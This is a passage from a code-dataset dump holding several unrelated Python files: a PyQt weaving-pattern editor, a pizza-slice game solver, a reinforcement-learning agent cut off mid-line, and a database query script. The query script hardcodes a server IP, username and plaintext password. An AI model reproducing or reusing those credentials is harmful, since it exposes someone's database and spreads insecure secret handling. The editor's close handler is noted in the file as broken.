self.add_warp_thread(warp_no)\n\n    def saveCall(self):\n        save_main = {\"thread_ct\": self.warp_thread_ct, \"current_yarn\": self.current_yarn_index,\n                     \"yarn_lock\": self.yarn_lock.isChecked(), \"title\": self.band_title.text()}\n        save_yarns = []\n        for yarn in self.yarns.yarns:\n            yarn_info = {\"index\": yarn.index, \"colour\": yarn.getColour(), \"inuse\": yarn.inuse}\n            save_yarns.append(yarn_info)\n        save_loom = []\n        for warp_thread in self.loom.warp_threads:\n            save_warp = {\"index\": warp_thread.index, \"yarn_index\": warp_thread.yarn_index}\n            save_picks = []\n            for pick in warp_thread.picks:\n                save_pick = {\"index\": pick.index, \"isPicked\": pick.isPicked}\n                save_picks.append(save_pick)\n            save_warp['picks'] = save_picks\n            save_loom.append(save_warp)\n        save_dump = {\"save_main\": save_main, \"save_yarns\": save_yarns, \"save_loom\": save_loom}\n        picklefile, _ = QFileDialog().getSaveFileName(self, \"Save Inkle Pattern\", \"./Patterns\",\n                                                      \"Inkle Pattern Files (*.ik2)\",\n                                                      options=QFileDialog.DontUseNativeDialog)\n        pickle.dump(save_dump, open(picklefile + '.ik2', \"wb\"))\n\n    def exitCall(self):\n        print('Exit app')\n\n    def closeEvent(self, event):\n        # NB: is_saved, save_settings, load_settings and self.ui are never defined on\n        # this Window class; this handler looks carried over from another project and\n        # will raise AttributeError when the window closes.\n        if self.is_saved:\n            event.accept()\n        else:\n            popup = QMessageBox(self)\n            popup.setIcon(QMessageBox.Warning)\n            popup.setText('The settings have been changed')\n            popup.setInformativeText('Do you want to save the changes or discard them?')\n            popup.setStandardButtons(QMessageBox.Save |\n                                     QMessageBox.Discard |\n                                     QMessageBox.Cancel)\n\n            popup.setDefaultButton(QMessageBox.Save)\n            answer = popup.exec_()\n            if answer == QMessageBox.Save:\n                self.save_settings()\n                event.accept()\n            elif answer == QMessageBox.Discard:\n                self.load_settings()\n                self.is_saved = True\n                event.accept()\n            elif answer == QMessageBox.Cancel:\n                event.ignore()\n\n        self.ui.statusLabel.clear()\n\n\nif __name__ == '__main__':\n    h = hpy()\n\n    myApp = QApplication(sys.argv)\n    window = Window()\n    
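# NOTE (added): guppy's hpy() heap profiler is set up above; re-enabling the\n    # h.heap() prints after exec_() dumps a summary of live objects, which can help\n    # confirm that removed warp threads and picks are really being freed.\n    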
    window.show()\n\n    myApp.exec_()\n    # print(h.heap())\n    # print(h.heapu())\n    sys.exit(0)\n","sub_path":"QTInkle12.py","file_name":"QTInkle12.py","file_ext":"py","file_size_in_byte":19691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"137284903","text":"import psycopg2\r\nimport pandas as pd\r\nimport sys\r\n\r\nconnection_info = {\r\n    \"host\" : \"206.189.80.195\",\r\n    \"database\" : \"bootcamp\",\r\n    \"user\" : \"bootcamp\",\r\n    \"password\" : \"Bootcamp*123\"\r\n}\r\nconn = None\r\n\r\ntry:\r\n    print('Connecting to the PostgreSQL database...')\r\n    conn = psycopg2.connect(**connection_info)\r\n\r\n    cursor = conn.cursor()\r\n    cursor.execute('SELECT \"Region\",COUNT(*) AS \"TotalCountry\" FROM bootcamp_test_ajat group by \"Region\",\"Country\" LIMIT 10')\r\n    data = cursor.fetchall()\r\n    cursor.close()\r\n\r\n    column_names = ['Region', 'TotalCountry']\r\n\r\n    df = pd.DataFrame(data, columns=column_names)\r\n    print(df)\r\n\r\nexcept (Exception, psycopg2.DatabaseError) as error:\r\n    print(error)\r\n    sys.exit(1) \r\nprint(\"Connection successful\")","sub_path":"jawaban_2/jawaban_8/nomer5.py","file_name":"nomer5.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"391551092","text":"# -*- coding: UTF-8 -*-\n# A row of pizza slices: you may take a slice from either end;\n# your friend then takes the larger of the two slices now at the ends;\n# repeat until none remain. What is the maximum total area you can get?\n# follow up : how to print path???\nimport collections\ndef getMaxPizza(nums, myAction):\n    # use memoization\n    path = []\n    nums = tuple(nums)\n    getMap = collections.defaultdict(int)\n    return DFS(nums, getMap, myAction, path)\n\ndef DFS(nums, getMap, myAction, path):\n    if not nums:\n        return 0\n    else:\n        if (nums, myAction) not in getMap:\n            if myAction: # distinguish whose turn it is\n                front = DFS(nums[1:], getMap, 0, path + [nums[0]])\n                back = DFS(nums[:-1], getMap, 0, path + [nums[-1]])\n                if front + nums[0] >= back + nums[-1]:\n                    getMap[(nums, myAction)] = front + nums[0]\n                    path.append(nums[0])\n                else:\n                    getMap[(nums, myAction)] = back + nums[-1]\n                    path.append(nums[-1])\n            else:\n                front = DFS(nums[1:], getMap, 1, path)\n                back = DFS(nums[:-1], getMap, 1, path)\n                getMap[(nums, myAction)] = min(front, back) # the opponent plays to minimize player 1's payoff\n        return getMap[(nums, myAction)]\n\nif __name__ == '__main__':\n    nums = [5,3,4,2,1,12,31,1,12,1]\n    nums = [0]\n    nums = [3,1,3,2,4,3]\n    assert getMaxPizza(nums, 0)+getMaxPizza(nums, 1) == sum(nums)","sub_path":"_pocket_gem_/take_pizza/memorization.py","file_name":"memorization.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"137759099","text":"import lightbox\nimport numpy as np\nfrom anytree import Node, RenderTree, LevelOrderIter\nfrom anytree.node.nodemixin import NodeMixin\nfrom scipy.stats import chi2_contingency, entropy\nimport math\nimport time\nimport os.path\nfrom os import path\n\n\n#==========================================================================================================\n#============================================ ABSTRACT AGENT ==============================================\n#==========================================================================================================\n\n#Parent of all agents\n\nclass AbstractAgent :\n    \n    #Constructor\n    def __init__(self, env, M=50, N=20, K=20, epsilon=0.1, experiment_id = None, data_path=None, agent_type=\"Abstract\"):\n        #lightbox env\n        self.env = env\n        \n        #agent type\n        self.type = agent_type\n        \n
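        #Illustrative (assumed) shape of the structure built just below, for readability:\n        #   self.FMDP[a] == {\"cpts\" : {var : CPTNode}, \"parents\" : {var : [parent_vars]}, \"action\" : a}\n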
        #FMDP : dict of DBNs; each DBN is a dict of CPTs (each initialized to a one-split tree on its own variable) plus a dict of parents\n        self.FMDP = dict()\n        for act in range(1, env.get_nb_light()+1):\n            self.FMDP[act] = {\"cpts\" : dict(), \"parents\" : dict(), \"action\" : act}\n            for var in range(1, env.get_nb_light()+1):\n                self.FMDP[act][\"cpts\"][var] = self.CPTNode(self.FMDP[act], var, self)\n                self.FMDP[act][\"parents\"][var] = []\n                child_0 = self.CPTNode(self.FMDP[act], var, self, parents_list = [var], child_01= 0)\n                child_1 = self.CPTNode(self.FMDP[act], var, self, parents_list = [var], child_01= 1)\n                child_0.parent = self.FMDP[act][\"cpts\"][var]\n                child_1.parent = self.FMDP[act][\"cpts\"][var]\n                self.FMDP[act][\"cpts\"][var].var=var\n        \n        \n        #Actions\n        self.actions = dict()\n        for act in range(1, env.get_nb_light()+1):\n            self.actions[act]=self.Action(act, self.env)\n        \n        #basic action associated with each variable\n        self.action_to_set = dict()\n        \n        #Options\n        self.options = dict()\n        \n        #For each option, a list (or tree?) of skills called by the option\n        self.options_hierarchies = dict() \n        \n        #current state of the env\n        self.state_t = env.get_state()\n        \n        #current option\n        self.current_option = None\n        \n        #current plan\n        self.current_plan=None\n        \n        #pointer on current option in plan\n        self.plan_ptr=-1\n        \n        #iteration\n        self.t = 1\n        \n        #Controllable set\n        self.C = set()\n        \n        #variables waiting to get into C\n        self.queue_for_C = set()\n        \n        #M : max number of steps in an option\n        self.M = M\n        \n        #N : number of executions before considering removing a refinement\n        self.N = N\n        \n        #K : minimum number of datapoints to consider a refinement\n        self.K = K\n        \n        #epsilon : exploration parameter in action selection\n        self.epsilon = epsilon\n        \n        #To be removed later, artificially associate lights to actions\n        self.artificial_setup()\n        \n        #Independence threshold for the chi-square test TODO pass as parameter\n        self.inde_treshold = 0.995\n        \n        #self.artificial_setup()\n        \n        self.refin = set()\n\n        self.timing = False\n        \n        self.start_time = None\n        \n        self.print_entropies = False\n        \n        #if not None, the agent will write the evolution of refinements to a file\n        self.experiment_id = experiment_id\n        \n        #path to the data directory\n        self.data_path=data_path\n        \n        if(not self.experiment_id == None):\n            if(path.exists(self.data_path+self.experiment_id+\"/\"+self.type)):\n                print(\"Experiment already exists ! No folder created, this agent will crash ! 
\nYou must change the experiment_id.\")\n            else:\n                os.makedirs(self.data_path+self.experiment_id+\"/\"+self.type)\n                self.my_dir = self.data_path+self.experiment_id+\"/\"+self.type\n                self.iter_array = np.array([0], dtype=np.int64)\n                self.time_array = np.array([0])\n                self.refin_array = np.array([0], dtype=np.int64)\n        \n        self.writing_period = 200\n        \n    #used to give the first-level basic actions to the agent, temporarily\n    def artificial_setup(self):\n        for i in range(1, self.env.get_nb_light()+1):\n            self.action_to_set[i]=self.actions[i]\n        for i in range(1, self.env.light_by_lvl[0]+1):\n            self.C.add(i)\n        \n    #string description\n    def __str__(self):\n        return(\"{} agent, currently at iteration {} and learned {} options\".format(self.type, self.t, len(self.options)))\n    \n    #launch the agent\n    def start(self):\n        if(self.start_time==None):\n            self.start_time = time.time()\n        while(not self.stop_condition()):\n            self.behaviour()\n    \n    #condition to stop the agent\n    def stop_condition(self):\n        #temporary, for tests\n        maxit = 20000\n        update_freq = 1\n        perc=self.t/maxit*100\n        if((perc-np.floor(perc))==0 and np.floor(perc)%update_freq==0):\n            #print(\"=========================================================\")\n            print(\"{}% - {} correct refinements \t \".format(perc, self.count_correct_refinements()))\n            if(self.timing):\n                d=time.time()-self.start_time\n                h = d//3600\n                r=d%3600\n                m = r//60\n                s=r%60\n                print(\"Running for {} hours, {} minutes, {} seconds\".format(h,m,s))\n            #print(\"=========================================================\")\n        if(self.t>maxit):\n            return True\n        #may be changed\n        return False\n    \n    \n    \n    #behaviour of the agent, the main loop\n    def behaviour(self):\n        act = self.selectAction( self.state_t)\n        act.execute()\n        state_t1 = self.env.get_state()\n        self.update(self.state_t, act, state_t1)\n        self.state_t = state_t1\n        self.t+=1\n        if(self.t%self.writing_period==0):\n            self.write_data()\n    \n    #Action selection, different for each type of agent\n    def selectAction(self, state):\n        #print(\"Not implemented in abstract\")\n        #return(self.actions[np.random.randint(20)+1])\n        if(np.random.rand()<0.9):\n            return(self.actions[np.random.randint(9)+1])\n        return(self.actions[np.random.randint(6)+10])\n\n    #Update the FMDP\n    def update(self, state_t, act, state_t1):\n        if(isinstance(act,int)):\n            act = self.actions[act]\n        current_DBN = self.FMDP[act.light_id]\n        for ind in current_DBN[\"cpts\"]:\n            #print(\"add point in DBN {}, CPT{}\".format(act, ind))\n            leaf = current_DBN[\"cpts\"][ind].add_datapoint(state_t, act, state_t1)\n            leaf.compute_BIC_Mono()\n            leaf.try_every_refinements()\n            current_DBN[\"cpts\"][ind].check_refinements(state_t)\n    \n    #Return a solution to set the var to the target value : an option if one exists, a basic action otherwise\n    def get_solution(self, var, target_value):\n        #print(\"solution for {} asked\".format(var))\n        #print(\"Implement get solution\")\n        if(target_value==0):\n            return self.action_to_set[var]\n        if(var in self.C):\n            if((var, target_value) in self.options):\n                return self.options[(var, target_value)]\n        if(var in self.action_to_set):\n            return self.action_to_set[var]\n        print(self.action_to_set)\n        print(\"No solution for {}\".format(var))\n        return(-1)\n    \n    #Return the basic Action associated with the var\n    def get_action(self, var):\n        #print(\"solution for {} asked\".format(var))\n        #print(\"Implement get solution\")\n        if(var in self.action_to_set):\n            return self.action_to_set[var]\n        print(\"No action for {}\".format(var))\n        return(-1)\n    \n    def try_option(self, var, target_value, parents, sig_0, 
opt_root):\n        if ((var, target_value) in self.options):\n            if self.options[(var, target_value)].sig_0 > sig_0:\n                return False\n            self.options[(var, target_value)].opt_root.used=False\n            self.remove(var, target_value)\n        o = self.create_option(var, target_value, parents, sig_0, opt_root)\n        #print(\"Create: \")\n        #o.print_tree()\n        #o.opt_root.parent.print_tree()\n        opt_root.used = True\n        return True\n    \n    \n    def create_option(self, var, target_value, parents, sig_0, opt_root):\n        \n        o = self.Option(self, var, target_value, parents, sig_0, opt_root)\n        #check if controllable, add to C or queue_for_C accordingly\n        if self.is_controllable(o.variable):\n            #TODO Check if an option wait for me to be controllable\n            self.C.add(o.variable)\n            self.check_update_C()\n            \n        else:\n            self.queue_for_C.add(o.variable) \n        return o\n    \n    #add a refinement in the set\n    def add_refin(self, tree_var, refin_var):\n        self.refin.add((tree_var, refin_var))\n        \n    def remove_refin(self, tree_var, refin_var):\n        if((tree_var, refin_var) in self.refin):\n            self.refin.remove((tree_var, refin_var))\n    \n    def count_correct_refinements(self):\n        n_ref=0\n        for r in self.env.refin:\n            if r in self.refin:\n                n_ref +=1\n        return n_ref\n\n    \n    def remove(self, var, target_value):\n        if(not (var, target_value) in self.options):\n            print(\"No option for {} to remove\".format((var, target_value)))\n            return\n        self.options[(var, target_value)].opt_root.used=False\n        #if((var, target_value) in self.options):\n            #print(\"remove : \")\n            #self.options[(var, target_value)].print_tree()\n        removed_o = self.options.pop((var, target_value), None)\n        \n        #remove option from other options' hierarchies \n        for node in LevelOrderIter(removed_o.root):\n            if(isinstance(node.solution, AbstractAgent.Option)):\n                #print(\"In remove {} -> {} \nTry to remove O{} [{}] of O{} [{}] hierarchies \".format(var,target_value, removed_o.variable,hex(id(removed_o)), node.solution.variable, hex(id(node.solution))))\n                \n                self.options_hierarchies[node.solution].remove(removed_o)\n        \n        #iterating over hierarchy even if it changes size\n        tmp_hierarchy_set = self.options_hierarchies[removed_o].copy()\n        for calling_opt in tmp_hierarchy_set:\n            if(calling_opt in self.options_hierarchies[removed_o]):\n                self.remove(calling_opt.variable, calling_opt.target_value)\n        \n        self.options_hierarchies.pop(removed_o,None)\n        if(var in self.C):\n            self.C.remove(var)\n        if(var in self.queue_for_C):\n            self.queue_for_C.remove(var)\n        \n        #To handle always controllable var, should be removed later\n        if(self.is_controllable(var)):\n            self.C.add(var)\n\n    #remove an option and check if another one can replace it\n    def remove_and_recreate_option(self, var, target_value):\n        \n        self.remove(var, target_value)\n        \n        for key in self.FMDP:\n            bn=self.FMDP[key]\n            root = bn[\"cpts\"][var].children[1-target_value]\n            tree=root\n            if not tree.is_leaf():\n                opt_parents = []\n                while(not tree.is_leaf()):\n                    opt_parents.append(tree.var)\n                    tree=tree.children[target_value]\n                \n                sig=0\n                for d in tree.dataset:\n                    if d[\"s_1\"][var-1] == target_value :\n                        sig+=1\n                sig = sig/len(tree.dataset)\n                self.try_option(var, target_value, opt_parents, sig, root)\n        \n        \n    def set_running_option(self, option):\n        self.current_option = option\n    \n    def is_controllable(self, var):\n        #should be removed later\n        if var in range(self.env.light_by_lvl[0]+1):\n            return True\n        \n        #if(not (var, 0) in self.options):\n        #    return False\n        #O_off = self.options[(var, 0)]\n        \n        if(not (var, 1) in self.options):\n            return False\n        O_on = self.options[(var, 1)]\n        \n        for p in O_on.parents:\n            if p not in self.C:\n
                return False\n        \n        #for p in O_off.parents:\n        #    if p not in self.C:\n        #        return False\n        return True\n    \n    \n    #Check if a waiting var can be added to C \n    def check_update_C(self):\n        updated = True\n        while(updated == True):\n            updated=False\n            to_remove = []\n            for var in self.queue_for_C:\n                if(self.is_controllable(var)):\n                    to_remove.append(var)\n                    self.C.add(var)\n                    updated=True\n            \n            for var in to_remove:\n                self.queue_for_C.remove(var)\n    \n    def write_data(self):\n        if(self.experiment_id == None):\n            print(\"No experiment\")\n            return\n        self.iter_array=np.append(self.iter_array, self.t)\n        self.refin_array=np.append(self.refin_array, self.count_correct_refinements())\n        self.time_array=np.append(self.time_array, time.time()-self.start_time)\n        \n        np.savetxt(self.my_dir+\"/iterations\", self.iter_array)\n        np.savetxt(self.my_dir+\"/refinements\", self.refin_array)\n        np.savetxt(self.my_dir+\"/time\", self.time_array)\n        \n        \n#--------INTERNAL CLASSES------------------\n    \n#==========================================================================================================\n#===================================== ACTION, internal class==============================================\n#==========================================================================================================\n\n    class Action():\n        \n        #constructor\n        def __init__(self, light_id, env):\n            self.light_id = light_id\n            self.env = env\n        \n        #string description\n        def __str__(self):\n            return(\"A{}\".format(self.light_id))\n        \n        #execution\n        def execute(self):\n            self.env.turn_on(self.light_id)\n        \n        def is_action(self):\n            return True\n        \n\n\n#==========================================================================================================\n#====================================== OPTION, internal class ============================================\n#==========================================================================================================\n\n\n    class Option():\n        \n        #Constructor : variable associated, sigma_0, list of parent variables\n        def __init__(self, my_agent, variable, target_value, parents, sig_0, opt_root):\n            #agent\n            self.my_agent = my_agent\n            #variable on which the option should have an effect\n            self.variable = variable\n            #value to which the variable is supposed to be set after the option execution\n            self.target_value = target_value\n            #parents\n            self.parents = parents\n            #sigma and sigma_0\n            self.sig_0 = sig_0\n            self.sig = sig_0\n            #nb of execution, used to update sigma\n            self.nb_exec=0\n            #step of the current execution\n            self.step = 0\n            #used when called as a nested option\n            self.previous_option = None\n            #True after terminal action\n            self.done = False\n            \n            self.opt_root = opt_root\n            \n            previousNode = None\n            options_called=[]\n            #for each parent\n            for i in range(len(parents)):\n                #create a Node\n                node = self.OptionTreeNode(parents[i], 1)\n                #set the 0 child\n                tmp_solution = my_agent.get_solution(parents[i], target_value)\n                if(isinstance(tmp_solution, AbstractAgent.Option)):\n                    #if(tmp_solution.check_if_call(self, [])):#wtf\n                    \n                    #tmp_solution = get_action(self.variable)\n                    #else:\n                    my_agent.options_hierarchies[tmp_solution].add(self)\n                if(target_value == 1):\n                    child_0 = self.OptionTreeNode(-1, 0, solution = tmp_solution)\n                    child_0.parent = node\n                else:\n                    child_1 = self.OptionTreeNode(-1, 1, solution = tmp_solution)\n                #if the solution is an option, add it to the options called\n                #print(tmp_solution)\n                if(not tmp_solution.is_action()):\n                    options_called.append(tmp_solution)\n                #check if root\n                if(i==0):\n                    self.root=node\n                    node.child_01 = 
None\n                #if not, link to the parent\n                else:\n                    node.parent=previousNode\n                #if last, set the 1 child\n                if(i==len(parents)-1):\n                    tmp_solution = my_agent.get_action(self.variable)\n                    if(target_value == 1):\n                        child_1 = self.OptionTreeNode(-1, 1, tmp_solution, is_terminal=True)\n                        child_1.parent=node\n                    else:\n                        child_0 = self.OptionTreeNode(-1, 0, tmp_solution, is_terminal=True)\n                        child_0.parent=node\n                    #if the solution is an option, add it to the options called\n                    if(not tmp_solution.is_action()):\n                        options_called.append(tmp_solution)\n                if(target_value == 0):\n                    child_1.parent = node\n                previousNode = node\n            \n            #Will probably be removed \n            self.exec_pointer = self.root\n            self.my_agent.options[(self.variable, target_value)] = self\n            \n            \n            \n            #register myself as caller of nested options \n            for o in options_called:\n                self.my_agent.options_hierarchies[o].add(self)\n            #init my own caller list \n            self.my_agent.options_hierarchies[self]=set()\n        \n        def __str__(self):\n            val=\"Off\"\n            if(self.target_value == 1):\n                val = \"On\"\n            return(\"O{} -> {}\".format(self.variable, val))\n        \n        def next_step(self, state):\n            next_move = self.root\n            self.step+=1\n            #go down the tree according to the state until a node contains an action or an option\n            while(next_move.solution==None):\n                var = next_move.var\n                if(state[var-1]):\n                    next_move=next_move.children[1]\n                else:\n                    next_move=next_move.children[0]\n            \n            #found an action, return it \n            if(next_move.solution.is_action()):\n                if(next_move.is_terminal):\n                    self.done = True\n                return(next_move.solution)\n            #found an option \n            else:\n                #set the nested option as current one and return the first action\n                next_move.solution.reset()\n                next_move.solution.set_previous(self)\n                self.my_agent.set_running_option(next_move.solution)\n                return(next_move.solution.next_step(state))\n        \n        #update sig and go back to the previous option if needed \n        def update_sig(self, delta):\n            self.nb_exec+=1\n            self.sig=self.sig+((delta-self.sig)/self.nb_exec)\n            if(not (self.previous_option==None)):\n                self.my_agent.set_running_option(self.previous_option)\n                self.previous_option = None\n\n        #Check if this option calls opt\n        def check_if_call(self, opt, visited):\n            if(self in self.my_agent.options_hierarchies[opt]):\n                return True\n            new_visited = visited + [self]\n            for node in LevelOrderIter(self.root):\n                if(isinstance(node.solution, AbstractAgent.Option) and not (node.solution in visited)):\n                    if(node.solution.check_if_call(opt, new_visited)):\n                        return True\n            return False\n        \n        #when called as a nested option, store the calling option in previous\n        def set_previous(self, previous_option):\n            self.previous_option = previous_option\n        \n        #reset before a new execution\n        def reset(self):\n            self.step = 0\n            self.exec_pointer = self.root\n            self.done=False\n        \n        #amazing display\n        def print_tree(self):\n            val=\"Off\"\n            if(self.target_value == 1):\n                val = \"On\"\n            print(\"O{} -> {}\".format(self.variable, val))\n            self.root.print_tree()    \n        \n        #used to check if a node contains an option or an action\n        def is_action(self):\n            return False\n        \n        #Internal class for nodes of the policy tree of the option\n        class OptionTreeNode(NodeMixin):\n            #Constructor : var of the split (-1 if option/action node), child_01 = 0 or 1, solution = action/option if needed, is_terminal = True for the terminal action node \n            def __init__(self, var, child_01, solution=None, is_terminal=False):\n                self.var = var\n                self.solution = solution\n                self.child_01 = child_01\n                self.is_terminal = is_terminal\n            \n            #another amazing display \n            def print_tree(self):\n                for pre, _, node in 
RenderTree(self):\n treestr = u\"%s%s\" % (pre, node.var)\n if(node.is_root):\n treestr = u\"%s%s\" % (pre,node.var)\n print(treestr.ljust(8))\n else:\n if(node.var == -1):\n #change when real solution\n treestr = u\"%s%s\" % (pre, \"{} [{}]\".format(node.solution,node.child_01))\n else: \n treestr = u\"%s%s\" % (pre, \"{} [{}]\".format(node.var,node.child_01))\n print(treestr.ljust(8))\n\n \n \n \n#==========================================================================================================\n#======================================= CPT NODES, internal class ========================================\n#==========================================================================================================\n\n\n\n class CPTNode(NodeMixin):\n \n #constructor\n def __init__(self, DBN, tree_var, my_agent, parents_list = None, dataset = None, child_01= None):\n self.name=\"X\"\n self.tree_var = tree_var\n self.DBN = DBN\n self.my_agent = my_agent\n self.var = -1\n self.BIC = 0\n self.used=False\n if(dataset == None):\n self.dataset = []\n else:\n self.dataset = dataset\n self.leaf_distrib = 0\n if(len(self.dataset)>0):\n for d in self.dataset:\n if(d[\"s_1\"][self.tree_var-1]==1):\n self.leaf_distrib+=1\n self.leaf_distrib = self.leaf_distrib / (len(self.dataset))\n \n if(parents_list == None):\n self.parents_list = []\n else:\n self.parents_list = parents_list \n self.child_01=child_01\n self.nb_var = my_agent.env.get_nb_light()\n #\n self.distrib_vect = dict() \n for i in range(1, self.nb_var+1):\n if not i in self.parents_list:\n self.distrib_vect[i] =[0,0]\n \n #print(\"TODO CPT node\")\n \n #string description\n def __str__(self):\n return(\" leaf : {}, datapoints : {}, distrib_vect {}\".format(self.is_leaf(), len(self.dataset), self.distrib_vect))\n \n def print_tree(self):\n for pre, _, node in RenderTree(self):\n #treestr = u\"%s%s\" % (pre, node.var)$\n if(node.is_root and node.is_leaf()):\n treestr = u\"%s%s\" % (pre, \"{} {}\".format(node.var,node.leaf_distrib))\n print(treestr.ljust(8))\n elif(node.is_root):\n treestr = u\"%s%s\" % (pre, node.var)\n print(treestr.ljust(8))\n elif(node.is_leaf()):\n treestr = u\"%s%s\" % (pre, \"-{}-> {}\".format(node.child_01,node.leaf_distrib))\n print(treestr.ljust(8))\n \n else:\n treestr = u\"%s%s\" % (pre, \"-{}-> {}\".format(node.child_01,node.var))\n print(treestr.ljust(8))\n\n \n def is_leaf(self):\n return(len(self.children)==0)\n \n #return the leaf where the point has been added \n def add_datapoint(self, s_0, act, s_1):\n val_on_s_0 = s_0[self.var-1]\n\n \n #if leaf, add to dataset and updat distrib_vect \n if(self.is_leaf()):\n self.leaf_distrib = (self.leaf_distrib*len(self.dataset) + s_1[self.tree_var-1]) / (len(self.dataset) + 1)\n self.dataset.append({\"s_0\" : s_0, \"a\" : act, \"s_1\" : s_1}) \n for j in self.distrib_vect:\n j_val = 0\n if s_0[j-1]:\n j_val=1\n \n self.distrib_vect[j][j_val]+=1\n return(self)\n \n #if not leaf\n else:\n if(val_on_s_0==False):\n return(self.children[0].add_datapoint( s_0, act, s_1))\n else:\n return(self.children[1].add_datapoint( s_0, act, s_1))\n \n #recreate distribution vectore, used on splits and prunes\n def recalculate_distrib_vect(self):\n self.distrib_vect = dict() \n for i in range(1, self.nb_var+1):\n if not i in self.parents_list:\n self.distrib_vect[i] =[0,0]\n for i in range(1, self.nb_var+1):\n if not i in self.parents_list:\n for d in self.dataset:\n i_val = 0\n if d[\"s_0\"][i-1]:\n i_val=1\n self.distrib_vect[i][i_val]+=1\n \n #Shannon's entropy over a distribution 
vector \n def shannon(self, vect):\n #tot = 0\n #h = 0\n \n #for x in vect:\n # tot+=x\n #for x in vect:\n # if(x>0):\n # h-= (x/tot) * np.log(x/tot)\n #return h\n h = entropy(vect, base=2 )\n #if(math.isnan(h)):\n # h=0\n return(h)\n \n def entropy(self):\n h=0\n for v in self.distrib_vect:\n h+=self.shannon(self.distrib_vect[v])\n return h\n \n #calculate entropy gain in this node if the action is executed in the given state and\n #the datapoint goes in this dataset\n def entropy_gain_old(self, state):\n h0 = self.entropy()\n \n h1=0\n for v in self.distrib_vect:\n tmp_v = self.distrib_vect[v].copy()\n if(state[v-1]==True):\n tmp_v[1]+=1\n else:\n tmp_v[0]+=1\n h1+=self.shannon(tmp_v)\n return h1 - h0 \n \n def entropy_gain(self, state):\n max_G = -1\n for v in self.distrib_vect:\n tmp_v = self.distrib_vect[v].copy()\n if(state[v-1]==True):\n tmp_v[1]+=1\n else:\n tmp_v[0]+=1\n G = self.shannon(tmp_v) - self.shannon(self.distrib_vect[v])\n if(math.isnan(G) or G>max_G):\n max_G=G\n return max_G\n \n \n #go down in the tree to find the dataset in which state goes and return the entropie gain\n def tree_entropy_gain(self, state):\n val_on_s_0 = state[self.var-1]\n\n \n #if leaf, return gain \n if(self.is_leaf()):\n return(self.entropy_gain(state))\n \n #if not leaf\n else:\n if(val_on_s_0==False):\n return(self.children[0].tree_entropy_gain(state))\n else:\n return(self.children[1].tree_entropy_gain(state))\n \n \n #BIC computation \n def compute_BIC_not_used(self):\n if(len(self.dataset)==0):\n return 0\n \n #Likelihood\n L=0\n #create N_ijk\n N=[]\n for i in range(1, self.nb_var+1):\n N.append(dict())\n #fill N_ijk\n for d in self.dataset:\n s_0 = d[\"s_0\"]\n s_1 = d[\"s_1\"]\n for i in range(1, self.nb_var+1):\n #get parents(i) state\n j_state_0=\"\"\n for j in self.DBN[\"parents\"][i]:\n if(s_0[j-1]==False):\n j_state_0+=\"0\"\n else:\n j_state_0+=\"1\"\n #get k\n k=0\n if(s_1[i-1]==True):\n k=1 \n #check presence of the j key \n if not j_state_0 in N[i-1]:\n N[i-1][j_state_0]=[0,0]\n #increment \n N[i-1][j_state_0][k]+=1\n \n #get the sum\n for i in range(1, self.nb_var+1):\n for j in N[i-1]:\n #get both N_ijk values\n N_ij0 = N[i-1][j][0]\n N_ij1 = N[i-1][j][1]\n #teta_ijk = N_ijk/sum_on_k(N_ijk) : probability estimated bu counting\n teta_ij0 = N_ij0/(N_ij0+N_ij1)\n teta_ij1 = N_ij1/(N_ij0+N_ij1)\n #Add to L in tetas are not 0\n if(teta_ij0>0 and teta_ij1 >0):\n #print(\"i = {} j = {} - >\\n\\tk = 0 Nijk = {} teta = {}\\n\\tk = 1 Nijk = {} teta = {}\\n\\tincrement L of {}\".format(i, j, N_ij0, teta_ij0, N_ij1, teta_ij1, N_ij0 * np.log(teta_ij0) + N_ij1 * np.log(teta_ij1)))\n L+= (N_ij0 * np.log(teta_ij0) + N_ij1 * np.log(teta_ij1))\n \n #finally compute BIC \n BIC = L - ((self.nb_var)/2 * np.log(len(self.dataset)))\n self.BIC = BIC\n return BIC\n \n #BIC Whithout sum on i\n def compute_BIC_Mono(self):\n if(len(self.dataset)==0):\n return 0\n #Likelihood\n L=0\n #create N_ijk\n N=dict()\n i=self.tree_var\n \n #fill N_ijk\n for d in self.dataset:\n s_0 = d[\"s_0\"]\n s_1 = d[\"s_1\"]\n #get parents(i) state\n j_state_0=\"\"\n #for j in self.DBN[\"parents\"][i]:\n for j in self.parents_list:\n if(s_0[j-1]==False):\n j_state_0+=\"0\"\n else:\n j_state_0+=\"1\"\n #get k\n k=0\n if(s_1[i-1]==True):\n k=1 \n #check presence of the j key \n if not j_state_0 in N:\n N[j_state_0]=[0,0]\n #increment \n N[j_state_0][k]+=1\n \n #get the sum\n for j in N:\n #get both N_ijk values\n N_ij0 = N[j][0]\n N_ij1 = N[j][1]\n #teta_ijk = N_ijk/sum_on_k(N_ijk) : probability estimated bu counting\n teta_ij0 
= N_ij0/(N_ij0+N_ij1)\n                teta_ij1 = N_ij1/(N_ij0+N_ij1)\n                #Add to L if thetas are not 0\n                if(teta_ij0>0 and teta_ij1 >0):\n                    #print(\"i = {} j = {} - >\n\tk = 0 Nijk = {} teta = {}\n\tk = 1 Nijk = {} teta = {}\n\tincrement L of {}\".format(i, j, N_ij0, teta_ij0, N_ij1, teta_ij1, N_ij0 * np.log(teta_ij0) + N_ij1 * np.log(teta_ij1)))\n                    L+= (N_ij0 * np.log(teta_ij0) + N_ij1 * np.log(teta_ij1))\n            #print(L) \n            #finally compute BIC \n            BIC = L - ((self.nb_var)/2 * np.log(len(self.dataset)))\n            self.BIC = BIC\n            return BIC\n        \n        def try_every_refinements(self):\n            #not enough data yet to consider a refinement\n            if(len(self.dataset) < self.my_agent.K):\n                return\n            #try a split on every candidate variable and keep the one with the largest BIC gain\n            max_refin = None\n            max_delta_refin = 0\n            for v in self.distrib_vect:\n                tmp_refin = self.try_refinement(v)\n                if(tmp_refin[0] and tmp_refin[2]>max_delta_refin):\n                    max_refin = tmp_refin\n                    max_delta_refin = tmp_refin[2]\n            if(max_refin == None):\n                return\n            #create refin\n            (_, var, delta, child_0, child_1) = max_refin\n            child_0.parent = self\n            child_1.parent = self\n            #to set tree var to the other value\n            target_var = 1 - self.dataset[0][\"s_0\"][self.tree_var-1]\n            self.var=var\n            self.dataset=[]\n            children_parents = self.parents_list + 